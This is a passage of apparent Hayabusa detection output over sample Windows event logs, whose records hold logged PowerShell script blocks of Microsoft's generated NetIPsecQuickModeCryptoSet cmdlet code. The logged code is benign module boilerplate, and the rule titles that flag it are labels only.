[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession}",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias 